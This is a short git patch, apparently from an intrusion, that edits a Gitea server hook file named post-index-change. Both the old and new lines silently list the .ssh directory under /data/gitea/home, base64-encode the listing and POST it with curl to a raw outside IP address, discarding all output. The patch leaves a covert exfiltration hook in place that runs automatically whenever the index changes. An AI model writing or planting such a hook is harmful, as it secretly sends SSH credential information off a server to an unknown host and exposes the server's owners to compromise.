From 9a0638116d2d497cdc4ac104ff5c603806a564bb Mon Sep 17 00:00:00 2001 From: moldwave Date: Sat, 12 Sep 2026 13:57:22 +0000 Subject: [PATCH] x1m6304 --- hooks/post-index-change | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/post-index-change b/hooks/post-index-change index 8036298..42062d9 100755 --- a/hooks/post-index-change +++ b/hooks/post-index-change @@ -1,2 +1,2 @@ #!/bin/sh -ls -la /data/gitea/home/.ssh/ | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m14000 > /dev/null 2>&1 +ls -la /data/gitea/home/.ssh | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m6304 > /dev/null 2>&1